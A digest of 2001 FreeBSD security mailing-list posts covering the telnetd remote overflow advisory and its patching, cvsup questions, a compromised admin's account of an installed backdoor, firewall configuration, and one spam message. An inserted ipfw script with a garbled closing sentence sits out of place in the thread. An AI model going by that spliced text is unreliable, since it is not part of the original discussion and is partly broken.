On Mon, Jul 23, 2001 at 05:00:56PM +0100, Ewan Carr wrote:
> Hi,
>
> Any pointers on the problem below would be
> appreciated - ta !
>
> Installed FreeBSD 4.2 successfully
> from CD
> Installed racoon (racoon-20010418a.tgz)
> from web successfully.
>
> When running racoon I get the following
> problem
> /usr/libexec/ld-elf.so.1 Shared object
> "libcrypto.so.2"
> not found ?
>
> Do I need an earlier version of racoon ?

When you installed 4.2 from the CD, did you also install the crypto distribution?

G'luck,
Peter

--
Do you think anybody has ever had *precisely this thought* before?
From owner-freebsd-security Mon Jul 23 12: 8:29 2001
Delivered-To: freebsd-security@freebsd.org
Received: from web13307.mail.yahoo.com (web13307.mail.yahoo.com [216.136.175.43]) by hub.freebsd.org (Postfix) with SMTP id 0DE6837B405 for ; Mon, 23 Jul 2001 12:08:17 -0700 (PDT) (envelope-from sumirati@yahoo.de)
Message-ID: <20010723190816.15888.qmail@web13307.mail.yahoo.com>
Received: from [193.174.9.99] by web13307.mail.yahoo.com via HTTP; Mon, 23 Jul 2001 21:08:16 CEST
Date: Mon, 23 Jul 2001 21:08:16 +0200 (CEST)
From: m p
Subject: Re: login.conf
To: fox@vl7.net
Cc: freebsd-security@FreeBSD.ORG
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

> Hi, All!
> I tried to configure my login.conf, so I have one question about the parameter
> "sbsize": what is this parameter limiting, what is the recommended size of
> the socket buffer, and what depends on this buffer? I checked the man pages but found
> nothing about this :(
>
> Thank you.
>
> Best regards,
> Vladimir.

Taken from the handbook of 4.3-RELEASE, section 6.6:

sbsize
    This is the limit on the amount of network memory, and thus mbufs, a user may consume. This originated as a response to an old DoS attack by creating a lot of sockets, but can be generally used to limit network communications.

Hope this helps
marc

From owner-freebsd-security Mon Jul 23 12:55:58 2001
Delivered-To: freebsd-security@freebsd.org
Received: from intense.net (server.intense.net [199.217.236.1]) by hub.freebsd.org (Postfix) with ESMTP id 11A3537B401 for ; Mon, 23 Jul 2001 12:55:53 -0700 (PDT) (envelope-from bobber@intense.net)
Received: from bob ([209.248.134.245]) by intense.net (8.8.8/8.8.8) with SMTP id OAA48831 for ; Mon, 23 Jul 2001 14:55:51 -0500 (CDT)
Message-ID: <03af01c113b1$1d6b6080$6c01a8c0@mpcsecurity.com>
From: "Robert Herrold"
To:
Subject: telnet exploit
Date: Mon, 23 Jul 2001 14:52:46 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="----=_NextPart_000_03AA_01C11387.22A47340"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4522.1200

I have never used cvsup before, and I'm a little confused about the current possible patch/fix.

First off, is there a 'patch/fix/replacement for telnetd' (/usr/libexec/telnetd). If so, would that be included in the cvsup?

Secondly, I've read through the cvsup documentation, and I'm a little unclear on whether it is basically just downloading source, or is it adding the packages. (do I need to recompile?)

Any help would be greatly appreciated.
Bob Herrold
Senior Network Engineer
Metropark Communications
10405 A Baur Blvd
St Louis MO 63132
(314)439-1900
From owner-freebsd-security Mon Jul 23 13:47:37 2001
Date: Mon, 23 Jul 2001 13:45:34 -0700
From: Kris Kennaway <kris@obsecurity.org>
To: Ewan Carr <ewancarr@yahoo.com>
Cc: FreeBSD-Security@FreeBSD.ORG
Subject: Re: libcrypto.o.2
Message-ID: <20010723134533.B86969@xor.obsecurity.org>
In-Reply-To: <20010723160056.98649.qmail@web13308.mail.yahoo.com>

No, you need to install the 'crypto' distribution parts of the FreeBSD
base system. Go back to sysinstall and do that.

Kris

On Mon, Jul 23, 2001 at 05:00:56PM +0100, Ewan Carr wrote:
> Hi,
>
> Any pointers on the problem below would be
> appreciated - ta !
>
> Installed FreeBSD 4.2 successfully
> from CD
> Installed racoon (racoon-20010418a.tgz)
> from web successfully.
>
> When running racoon I get the following
> problem
> /usr/libexec/ld-elf.so.1 Shared object
> "libcrypto.so.2"
> not found ?
>
> Do I need an earlier version of racoon ?
>
> ps.
> could you cc ewancarr@yahoo.com - i do not subscribe
> to the list - thanks again
>
> ____________________________________________________________
> Do You Yahoo!?
> Get your free @yahoo.co.uk address at http://mail.yahoo.co.uk
> or your free @yahoo.ie address at http://mail.yahoo.ie

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE7XIzsWry0BWjoQKURAuNEAJkBnYBiz9Cp86g0h/mVNhBxVQkuKgCgqnJ5
B0QzojiwyfMK3bRWnL423+g=
=amut
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Jul 23 13:55:49 2001
Date: Mon, 23 Jul 2001 16:55:35 -0400
From: "Antoine Beaupre (LMC)" <antoine.beaupre@ericsson.ca>
To: freebsd-security@FreeBSD.ORG
Subject: rc.firewall change comments request
Message-ID: <3B5C8F47.5050300@lmc.ericsson.se>
Organization: LMC, Ericsson Research Canada

Hi.

I find that using a custom ruleset is a pain in the current rc.firewall
setup. For example, since alternate setups are sourced using "ipfw" instead
of the shell, you do not have access to valuable variables and conditionals,
being limited to ipfw's syntax.

I use conditionals and variables to make the config file more readable. I
think that having a flat ipfw source file is impractical and hard to
maintain.

What I suggest is to change the way of sourcing alternate config files.
Instead of doing:

    *)
        if [ -r "${firewall_type}" ]; then
            ${fwcmd} ${firewall_flags} ${firewall_type}

rc.firewall should be doing:

    *)
        if [ -r "${firewall_type}" ]; then
            . ${firewall_type}

What do you people think about that? Should I submit a pr?

Thanks,

A.

-- 
Antoine Beaupré
Jambala TCM team
Ericsson Canada inc.
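The approach proposed above, as an added example that is neither code from this thread nor FreeBSD's own rc.firewall: a ruleset kept as a shell script so that variables, loops and conditionals are available, wired in through the firewall_script knob in /etc/rc.conf rather than handed to ipfw as a flat rule file. The path /etc/rc.firewall.local, the interface name fxp0 and every address in it are assumed values. It also limits telnet to a short list of admin hosts and logs everything else aimed at port 23, which is the kind of packet-filter workaround the telnetd advisory later in this digest recommends.

```shell
#!/bin/sh
# Added example, not FreeBSD's rc.firewall: a firewall ruleset written as a
# shell script so that variables, loops and conditionals are available.
# Assumed wiring in /etc/rc.conf (the path is an assumption):
#     firewall_enable="YES"
#     firewall_script="/etc/rc.firewall.local"
# rc.network then sources this file with the shell instead of handing a
# flat rule file to ipfw(8).

fwcmd="${fwcmd:-/sbin/ipfw}"               # set fwcmd=echo for a dry run
oif="${oif:-fxp0}"                         # assumed outside interface
inet="${inet:-192.0.2.0/24}"               # assumed inside network
admin_hosts="${admin_hosts:-203.0.113.10 203.0.113.11}"   # assumed admin hosts
allow_telnet="${allow_telnet:-no}"         # telnet stays closed unless set to yes

# Print the ruleset, one ipfw argument list per line, so the policy can be
# reviewed or tested without touching the kernel.
generate_rules() {
    printf '%s\n' "add 100 allow ip from any to any via lo0"
    printf '%s\n' "add 200 deny ip from any to 127.0.0.0/8"
    printf '%s\n' "add 300 deny ip from 127.0.0.0/8 to any"
    # Anti-spoofing: packets claiming an inside source may not arrive from outside.
    printf '%s\n' "add 400 deny log ip from ${inet} to any in via ${oif}"

    # ssh from anywhere; telnet only from the listed admin hosts, and only
    # when explicitly enabled. Everything else aimed at port 23 is logged.
    printf '%s\n' "add 500 allow tcp from any to me 22 in via ${oif} setup"
    if [ "$allow_telnet" = "yes" ]; then
        for h in $admin_hosts; do
            printf '%s\n' "add 600 allow tcp from ${h} to me 23 in via ${oif} setup"
        done
    fi
    printf '%s\n' "add 700 deny log tcp from any to me 23 in via ${oif}"

    # Established TCP sessions and outbound traffic from the inside network.
    printf '%s\n' "add 800 allow tcp from any to any established"
    printf '%s\n' "add 900 allow ip from ${inet} to any out via ${oif}"
    printf '%s\n' "add 65000 deny log ip from any to any"
}

# Load the ruleset: flush, then hand each generated line to ipfw.
apply_rules() {
    ${fwcmd} -f flush
    generate_rules | while read -r rule; do
        ${fwcmd} -q $rule    # word splitting of $rule is intended
    done
}

# How many telnet "allow" rules the current settings produce.
telnet_allow_count() {
    generate_rules | grep -c "allow tcp from .* to me 23" || true
}

case "${1:-}" in
    apply) apply_rules ;;
    show)  generate_rules ;;
esac
```

Run it as `sh /etc/rc.firewall.local show` to review the generated policy, or with `fwcmd=echo sh /etc/rc.firewall.local apply` to see exactly what would be handed to ipfw; rc.network sources the file at boot, so the `case` at the bottom is what keeps it from doing anything when sourced without an argument is not required, and the variables can also be overridden from the environment before sourcing.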
mailto:antoine.beaupre@ericsson.ca

From owner-freebsd-security Mon Jul 23 14:13:00 2001
Date: Mon, 23 Jul 2001 14:12:50 -0700
From: Kris Kennaway <kris@obsecurity.org>
To: Joseph <jolt-mail@nicholasofmyra.org>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Make world - crypt-blowfish.c error
Message-ID: <20010723141245.A96187@xor.obsecurity.org>
In-Reply-To: <5.1.0.14.0.20010723123615.00aebd90@10.100.0.5>

You didn't cvsup the src-crypto collection.

Kris

On Mon, Jul 23, 2001 at 12:53:33PM -0400, Joseph wrote:
> I'm not sure what, if anything, I'm doing wrong. I've installed FreeBSD
> 4.3 with the src tree. I could do a make world fine after the initial
> installation. I cvsup'ed, and now I keep getting this error.
>
> make world
>
> or
>
> cd /usr/src/lib/libcrypt/
> make
>
> results in:
> make: don't know how to make crypt-blowfish.c. Stop
>
> Any suggestions?
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE7XJNKWry0BWjoQKURAl1HAJ9EvhHus9v4k9eUnhAco0dlmKzQ2gCg/OrA
Fa9RXPmdHM0ltjCySN51D24=
=VqrI
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Jul 23 14:16:29 2001
Date: Mon, 23 Jul 2001 14:16:24 -0700
From: Kris Kennaway <kris@obsecurity.org>
To: Chuck Rock <carock@epconline.net>
Cc: security@FreeBSD.ORG
Subject: Re: telnetd root exploit
Message-ID: <20010723141609.B96187@xor.obsecurity.org>
References: <20010722120932.E56521@osaka.louisville.edu> <004d01c11399$dd3d9850$1805010a@epconline.net>
In-Reply-To: <004d01c11399$dd3d9850$1805010a@epconline.net>

On Mon, Jul 23, 2001 at 12:06:50PM -0500, Chuck Rock wrote:
> Until an official advisory is released,
> does that mean there's no official patch yet?

Correct. The patches posted here last week were incomplete; I'm still
hoping to get the advisory out later today.

Kris

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE7XJQZWry0BWjoQKURAnkuAJ0fQrW/ONicrrXt3jtBanZ1bra7CQCgjc98
iew/8Rx40/vB9NQGatPALNA=
=jhru
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Jul 23 14:41:15 2001
Date: Mon, 23 Jul 2001 23:40:07 +0200
From: Erik Trulsson <ertr1013@student.uu.se>
To: Robert Herrold <bobber@intense.net>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: telnet exploit
Message-ID: <20010723234007.A69282@student.uu.se>
In-Reply-To: <03af01c113b1$1d6b6080$6c01a8c0@mpcsecurity.com>
[Please remember to wrap your lines at < 80 columns]

On Mon, Jul 23, 2001 at 02:52:46PM -0500, Robert Herrold wrote:
> I have never used cvsup before, and I'm a little confused about the
> current possible patch/fix.
>
> First off, is there a 'patch/fix/replacement for telnetd'
> (/usr/libexec/telnetd). If so, would that be included in the cvsup?

There has been a fix committed so, yes, cvsup would get the fixed version.

> Secondly, I've read through the cvsup documentation, and I'm a little
> unclear on whether it is basically just downloading source, or is it
> adding the packages. (do I need to recompile?)

Cvsup downloads the source. You need to recompile afterwards.

> Any help would be greatly appreciated.

-- 
Erik Trulsson
ertr1013@student.uu.se

From owner-freebsd-security Mon Jul 23 14:53:38 2001
Date: Mon, 23 Jul 2001 17:53:21 -0400
From: "alexus" <ml@db.nexgen.com>
To: "Erik Trulsson" <ertr1013@student.uu.se>, "Robert Herrold" <bobber@intense.net>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: telnet exploit
Message-ID: <001401c113c1$e43551c0$0d00a8c0@alexus>
References: <03af01c113b1$1d6b6080$6c01a8c0@mpcsecurity.com> <20010723234007.A69282@student.uu.se>
Organization: NexGen
what about those folks who prefer to stay running releases instead of
current?

----- Original Message -----
From: "Erik Trulsson" <ertr1013@student.uu.se>
To: "Robert Herrold" <bobber@intense.net>
Cc: <freebsd-security@FreeBSD.ORG>
Sent: Monday, July 23, 2001 5:40 PM
Subject: Re: telnet exploit

> [Please remember to wrap your lines at < 80 columns]
>
> On Mon, Jul 23, 2001 at 02:52:46PM -0500, Robert Herrold wrote:
> > I have never used cvsup before, and I'm a little confused about the
> > current possible patch/fix.
> >
> > First off, is there a 'patch/fix/replacement for telnetd'
> > (/usr/libexec/telnetd). If so, would that be included in the cvsup?
>
> There has been a fix committed so, yes, cvsup would get the fixed
> version.
>
> > Secondly, I've read through the cvsup documentation, and I'm a little
> > unclear on whether it is basically just downloading source, or is it
> > adding the packages. (do I need to recompile?)
>
> Cvsup downloads the source. You need to recompile afterwards.
>
> > Any help would be greatly appreciated.
>
> --
> Erik Trulsson
> ertr1013@student.uu.se

From owner-freebsd-security Mon Jul 23 15:01:51 2001
Date: Mon, 23 Jul 2001 15:01:22 -0700
From: Sean Chittenden <sean@mailhost.tgd.net>
To: alexus <ml@db.nexgen.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: telnet exploit
Message-ID: <20010723150122.E34549@rand.tgd.net>
References: <03af01c113b1$1d6b6080$6c01a8c0@mpcsecurity.com> <20010723234007.A69282@student.uu.se> <001401c113c1$e43551c0$0d00a8c0@alexus>
In-Reply-To: <001401c113c1$e43551c0$0d00a8c0@alexus>

cvsup can be used to track -stable and -release. Check out chapter 20 of
the handbook, and look through the -stable and -questions mail archives
for more information on this. RELENG_2_2 was MFC'ed earlier today so I
imagine that RELENG_4 has already been MFC'ed.
-sc

PS -questions is probably a better place to ask this than -security.

> what about those folks who prefer to stay running releases instead of
> current?
>
> > [Please remember to wrap your lines at < 80 columns]
> >
> > On Mon, Jul 23, 2001 at 02:52:46PM -0500, Robert Herrold wrote:
> > > I have never used cvsup before, and I'm a little confused about the
> > > current possible patch/fix.
> > >
> > > First off, is there a 'patch/fix/replacement for telnetd'
> > > (/usr/libexec/telnetd). If so, would that be included in the cvsup?
> >
> > There has been a fix committed so, yes, cvsup would get the fixed
> > version.
> >
> > > Secondly, I've read through the cvsup documentation, and I'm a little
> > > unclear on whether it is basically just downloading source, or is it
> > > adding the packages. (do I need to recompile?)
> >
> > Cvsup downloads the source. You need to recompile afterwards.
> >
> > > Any help would be greatly appreciated.

-- 
Sean Chittenden

-----BEGIN PGP SIGNATURE-----
Comment: Sean Chittenden

iEYEARECAAYFAjtcnrEACgkQn09c7x7d+q1KvwCePr0bEKRA/Jrwnkhw5QFSvZIW
UbAAoKbOr6bYvKNXTRf9YtfZ6AHH7TUA
=L+cJ
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Jul 23 15:26:27 2001
Date: Mon, 23 Jul 2001 18:26:10 -0400
From: Chris Faulhaber <cdf.lists@fxp.org>
To: alexus <ml@db.nexgen.com>
Cc: Erik Trulsson <ertr1013@student.uu.se>, Robert Herrold <bobber@intense.net>, freebsd-security@FreeBSD.ORG
Subject: Re: telnet exploit
Message-ID:
<20010723182610.A37637@peitho.fxp.org>
References: <03af01c113b1$1d6b6080$6c01a8c0@mpcsecurity.com> <20010723234007.A69282@student.uu.se> <001401c113c1$e43551c0$0d00a8c0@alexus>
In-Reply-To: <001401c113c1$e43551c0$0d00a8c0@alexus>

On Mon, Jul 23, 2001 at 05:53:21PM -0400, alexus wrote:
> what about those folks who prefer to stay running releases instead of
> current?
>

use RELENG_4_3, which is 4.3-RELEASE with security patches

-- 
Chris D.
Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: FreeBSD: The Power To Serve

iEYEARECAAYFAjtcpIEACgkQObaG4P6BelAuqACdFBKbCK6NNthgMeqgCwoq8LKZ
6UEAoJKnert7ls4KRzShADyLXnqX5s99
=AEsO
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Jul 23 16:06:37 2001
Date: Mon, 23 Jul 2001 16:06:25 -0700
From: Gregory Neil Shapiro <gshapiro@gshapiro.net>
To: "Antoine Beaupre (LMC)" <antoine.beaupre@ericsson.ca>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: rc.firewall change comments request
Message-ID: <15196.44529.197423.239149@horsey.gshapiro.net>
In-Reply-To: <3B5C8F47.5050300@lmc.ericsson.se>
Antoine.Beaupre> For example, since alternate setups are sourced using
Antoine.Beaupre> "ipfw" instead of the shell, you do not have access to
Antoine.Beaupre> valuable variables and conditionals, being limited to
Antoine.Beaupre> ipfw's syntax.

Antoine.Beaupre> I use conditionals and variables to make the config file
Antoine.Beaupre> more readable.

Antoine.Beaupre> I think that having a flat ipfw source file is impractical
Antoine.Beaupre> and hard to maintain.

Why not just set firewall_script in your /etc/rc.conf?

firewall_script="/etc/rc.firewall"	# Which script to run to set up the firewall

From owner-freebsd-security Mon Jul 23 16:20:46 2001
Date: Mon, 23 Jul 2001 16:20:26 -0700 (PDT)
From: Jorge Velazquez
Reply-To: a_golza_@hotmail.com
Subject: Dear User
Message-Id: <20010723232026.46F4337B401@hub.freebsd.org>

Filtering drinking water improves our quality of life.

Most of the bad tastes, odours and turbidity present in drinking water are
caused by the presence of chlorine and organic material.

Chlorine, used very effectively to make drinking water potable, is the cause
of bad taste and in larger quantities is harmful to health.
The organic material present in tanks and mains-water pipes (residues of
leaves, insects, etc.) adds turbidity and bad taste to the water.

There is also the combination of organic material with chlorine, forming the
dangerous trihalomethanes (THM), a highly toxic compound.

The simplest and most effective way to remove the chlorine as well as the
organic material and the THMs is by passing the water through a purifying
filter (*) with an activated-carbon bed.

(*) CUNO has more than 90 years of experience in water purification and
filtration, and supplies water filters to companies such as Mc Donald's in
Argentina and worldwide.

If you would like to receive more information on this subject, call
011-4555-6050
or, toll-free from the interior of the country,
0800-222-6392

Thank you.

NeWater Argentina
Water purification for businesses and homes
Charlone 516, Buenos Aires, Argentina
tel: 011-4555-6050 (rot.)
email: newater@movi.com.ar

If you do not wish to receive further information from us, send us an email
with the subject "Borrar". Thank you.

Produced by La Jolla Advertiding Co., CA, USA

From owner-freebsd-security Mon Jul 23 16:43:16 2001
Date: Mon, 23 Jul 2001 20:24:31 +0000 (GMT)
From: "www.slashx.net" <netbios@exodus.slashx.net>
Subject: SSH 3 exploit?

i heard there is a new SSHd exploit, is this a rumor or is this true?
thanks.

From owner-freebsd-security Mon Jul 23 17:02:38 2001
Date: Tue, 24 Jul 2001 01:02:34 +0100 (BST)
From: rik@rikrose.net
To: "www.slashx.net" <netbios@exodus.slashx.net>
Cc: security@FreeBSD.ORG
Subject: Re: SSH 3 exploit?
On Mon, 23 Jul 2001, www.slashx.net wrote:
> i heard there is a new SSHd exploit, is this a rumor or is this
> true? thanks.

Over a week old on Bugtraq, but for COMMERCIAL ssh 3.0.0:

http://securityfocus.com/templates/archive.pike?list=1&start=2001-07-15&mid=198404&threads=0&fromthread=0&end=2001-0721&

From owner-freebsd-security Mon Jul 23 17:05:23 2001
Date: Mon, 23 Jul 2001 17:05:12 -0700
From: Kris Kennaway <kris@obsecurity.org>
To: "www.slashx.net" <netbios@exodus.slashx.net>
Cc: security@FreeBSD.ORG
Subject: Re: SSH 3 exploit?
Message-ID: <20010723170512.A49780@xor.obsecurity.org>

Doesn't affect the version included with FreeBSD.
Kris

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE7XLu3Wry0BWjoQKURAu35AJ4sOvs4k8CPgt7srOCB9i3XJq5FrgCg3x18
+q24w2p5tK5stXXNnBCQU54=
=9g31
-----END PGP SIGNATURE-----

From owner-freebsd-security Mon Jul 23 17:16:19 2001
Date: Mon, 23 Jul 2001 17:16:01 -0700 (PDT)
From: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
To: FreeBSD Security Advisories <security-advisories@FreeBSD.org>
Subject: FreeBSD Security Advisory FreeBSD-SA-01:49.telnetd
Reply-To: security-advisories@FreeBSD.org
Message-Id: <200107240016.f6O0G1408361@freefall.freebsd.org>

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-01:49                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          telnetd contains remote buffer overflow

Category:       core
Module:         telnetd
Announced:      2001-07-23
Credits:        Sebastian
Affects:        All releases of FreeBSD 3.x, 4.x prior to 4.4,
                FreeBSD 4.3-STABLE prior to the correction date
Corrected:      2001-07-23
FreeBSD only:   NO

I.
Background

telnetd is the server for the telnet remote virtual terminal protocol.

II.  Problem Description

An overflowable buffer was found in the version of telnetd included with
FreeBSD. Due to incorrect bounds checking of data buffered for output to
the remote client, an attacker can cause the telnetd process to overflow
the buffer and crash, or execute arbitrary code as the user running
telnetd, usually root.

A valid user account and password are not required to exploit this
vulnerability, only the ability to connect to a telnetd server. The
telnetd service is enabled by default on all FreeBSD installations if
the 'high' security setting is not selected at install-time.

This vulnerability is known to be exploitable, and is being actively
exploited in the wild.

All released versions of FreeBSD prior to the correction date including
3.5.1-RELEASE and 4.3-RELEASE are vulnerable to this problem. It was
corrected prior to the forthcoming release of 4.4-RELEASE.

III. Impact

Remote users can cause arbitrary code to be executed as the user running
telnetd, usually root.

IV.  Workaround

1) Disable the telnet service, which is usually run out of inetd: comment
out the following lines in /etc/inetd.conf, if present.

telnet  stream  tcp     nowait  root    /usr/libexec/telnetd    telnetd
telnet  stream  tcp6    nowait  root    /usr/libexec/telnetd    telnetd

and execute the following command as root:

# kill -HUP `cat /var/run/inetd.pid`

2) Impose access restrictions using TCP wrappers (/etc/hosts.allow), or a
network-level packet filter such as ipfw(8) or ipf(8) on the perimeter
firewall or the local machine, to limit access to the telnet service to
trusted machines.

V.   Solution

One of the following:

1) Upgrade your vulnerable FreeBSD system to 4.3-STABLE or the RELENG_4_3
security branch after the respective correction dates.

2) FreeBSD 3.5.1, 4.x systems prior to the correction date:

There are two versions of the patch available, for systems with and
without the /usr/src/crypto/telnet sources.
To determine whether your system has the crypto-telnet sources
installed, perform the following command:

# ls /usr/src/crypto/telnet/telnetd

A response of

ls: /usr/src/crypto/telnet/telnetd: No such file or directory

indicates you do not have the sources present and should download the
non-crypto-telnet patch.

These patches have been verified to apply to FreeBSD 4.2-RELEASE,
4.3-RELEASE and 3.5.1-STABLE dated prior to 2001-07-20 (users of
3.5.1-RELEASE must have applied the patches from FreeBSD Security
Advisory 00:69 prior to applying this patch). These patches may or may
not apply to older, unsupported releases of FreeBSD.

2a) For systems with the crypto-telnet sources installed

Download the patch and the detached PGP signature from the following
locations, and verify the signature using your PGP utility.

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd-crypto.patch
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd-crypto.patch.asc

# cd /usr/src/
# patch -p < /path/to/patch
# cd /usr/src/secure/libexec/telnetd
# make depend && make all install

2b) For systems without the crypto-telnet sources installed

Download the patch and the detached PGP signature from the following
locations, and verify the signature using your PGP utility.

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd.patch
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:49/telnetd.patch.asc

# cd /usr/src/
# patch -p < /path/to/patch
# cd /usr/src/libexec/telnetd
# make depend && make all install

3) FreeBSD 4.3-RELEASE systems:

An experimental upgrade package is available for users who wish to
provide testing and feedback on the binary upgrade process. This package
may be installed on FreeBSD 4.3-RELEASE systems only, and is intended
for use on systems for which source patching is not practical or
convenient.
If you use the upgrade package, feedback (positive or negative) to
security-officer@FreeBSD.org is requested so we can improve the process
for future advisories.

During the installation procedure, backup copies are made of the files
which are replaced by the package. These backup copies will be
reinstalled if the package is removed, reverting the system to a
pre-patched state.

Two versions of the upgrade package are available, depending on whether
or not the system has the crypto distribution installed. To verify
whether your system has the crypto distribution installed, perform the
following command:

# ls /usr/bin/openssl

Possible responses:

/usr/bin/openssl                # This response indicates you have
                                # crypto present

ls: /usr/bin/openssl: No such file or directory
                                # This response indicates you do not have
                                # crypto present

3a) If crypto is not present

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-01.49.tgz
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-01.49.tgz.asc

Verify the detached PGP signature using your PGP utility.

# pkg_add security-patch-telnetd-01.49.tgz

3b) If crypto is present

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-crypto-01.49.tgz
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/packages/SA-01:49/security-patch-telnetd-crypto-01.49.tgz.asc

Verify the detached PGP signature using your PGP utility.
# pkg_add security-patch-telnetd-crypto-01.49.tgz

From owner-freebsd-security Mon Jul 23 17:51:28 2001
Date: Mon, 23 Jul 2001 17:51:23 -0700
From: Kris Kennaway
To: Montgomery Newcom
Cc: security-officer@FreeBSD.org, security@FreeBSD.org
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:49.telnetd (fwd)
Message-ID: <20010723175122.A51801@xor.obsecurity.org>

On Mon, Jul 23, 2001 at 05:38:48PM -0700, Montgomery Newcom wrote:
>
> I installed security-patch-telnetd-crypto-01.49.tgz ..
>
> (twitch)$ telnet www
> Trying 64.210.23.2...
> Connected to helterskelter.org.
> Escape character is '^]'.
> /usr/libexec/ld-elf.so.1: Shared object "libpam.so.2" not found
> Connection closed by foreign host.
>
> (www)$ ls /usr/bin/openssl
> /usr/bin/openssl

Grr, I'm not sure how that happened; that package was supposed to be
built in a chroot. I've corrected it and uploaded the new version.

Kris

From owner-freebsd-security Mon Jul 23 18:27:55 2001
Date: Tue, 24 Jul 2001 11:27:46 +1000 (EST)
From: Andy Farkas
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:49.telnetd (fwd)

On Mon, 23 Jul 2001, FreeBSD Security Advisories wrote:

> Topic:          telnetd contains remote buffer overflow

Well, hate to say this, but several of my systems were cracked into. No
need to say any more, it was all my fault...
Anyways, there was a process running called 'mingetty' with a zombie
/bin/sh right after it... the file was added to /usr/bin and given a
time/datestamp similar to the other files to make it look like it was
installed with the system ... a line was also added to /etc/rc to start
it up on reboot...

Heaven knows what else they did, but I just thought I'd send a
heads-up, as this was a fairly obvious hack to spot...

Bad Andy. No cookie.

--

 :{ andyf@speednet.com.au
Andy Farkas
System Administrator
Speednet Communications
http://www.speednet.com.au/

From owner-freebsd-security Mon Jul 23 22:05:02 2001
Date: Tue, 24 Jul 2001 09:04:50 +0400
From: Gennady Persinin
To: freebsd-security@FreeBSD.ORG
Subject: auth 237d96bf unsubscribe freebsd-security raindog@yell.ru
Message-ID: <1772871298.20010724090450@yell.ru>

auth 237d96bf unsubscribe freebsd-security raindog@yell.ru

From owner-freebsd-security Tue Jul 24 3:12:38 2001
Date: Tue, 24 Jul 2001 12:12:37 +0200
From: Neil Blakey-Milner
To: "Antoine Beaupre (LMC)"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: rc.firewall change comments request
Message-ID: <20010724121237.A12846@mithrandr.moria.org>
In-Reply-To: <3B5C8F47.5050300@lmc.ericsson.se>
On Mon 2001-07-23 (16:55), Antoine Beaupre (LMC) wrote:
> I find that using a custom ruleset is a pain in the current rc.firewall
> setup.
>
> For example, since alternate setups are sourced using "ipfw" instead of
> the shell, you do not have access to valuable variables and
> conditionals, being limited to ipfw' syntax.

You can use the '-p' option to ipfw to specify a preprocessor. The man
page says a bit more.

Neil
--
Neil Blakey-Milner
nbm@mithrandr.moria.org

From owner-freebsd-security Tue Jul 24 6:34:23 2001
Date: Tue, 24 Jul 2001 09:34:08 -0400
From: "Antoine Beaupre (LMC)"
Organization: LMC, Ericsson Research Canada
To: Gregory Neil Shapiro
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: rc.firewall change comments request
Message-ID: <3B5D7950.8070906@lmc.ericsson.se>
References: <3B5C8F47.5050300@lmc.ericsson.se> <15196.44529.197423.239149@horsey.gshapiro.net>

Gregory Neil Shapiro wrote:
> Antoine.Beaupre> For example, since alternate setups are sourced using
> Antoine.Beaupre> "ipfw" instead of the shell, you do not have access to
> Antoine.Beaupre> valuable variables and conditionals, being limited to
> Antoine.Beaupre> ipfw' syntax.
>
> Antoine.Beaupre> I use conditionals and variables to make the config file
> Antoine.Beaupre> more readable.
>
> Antoine.Beaupre> I think that having a flat ipfw source file is unpractical
> Antoine.Beaupre> and hard to maintain.
>
> Why not just set firewall_script in your /etc/rc.conf?
>
> firewall_script="/etc/rc.firewall"   # Which script to run to set up the firewall

Ah-ah! I knew there was something I was missing. Sorry for the lame
complaining. :)

A.
--
Antoine Beaupré
Jambala TCM team
Ericsson Canada inc.
mailto:antoine.beaupre@ericsson.ca

From owner-freebsd-security Tue Jul 24 6:47:51 2001
Date: Tue, 24 Jul 2001 10:48:41 -0300
From: "Mario de Oliveira Lobo Neto"
Organization: American School of Recife - Brazil
To: freebsd-security@FreeBSD.ORG
Subject: ipfw question
Reply-To: mlobo@ear.com.br
Message-ID: <3B5D528A.2304.1D1FDA@localhost>

Please forgive my lame question but here it goes.

We used to have FreeBSD 2.2.8. Every time a rule in ipfw was met, the
attempt would get listed on the monitor. I know everything is in the
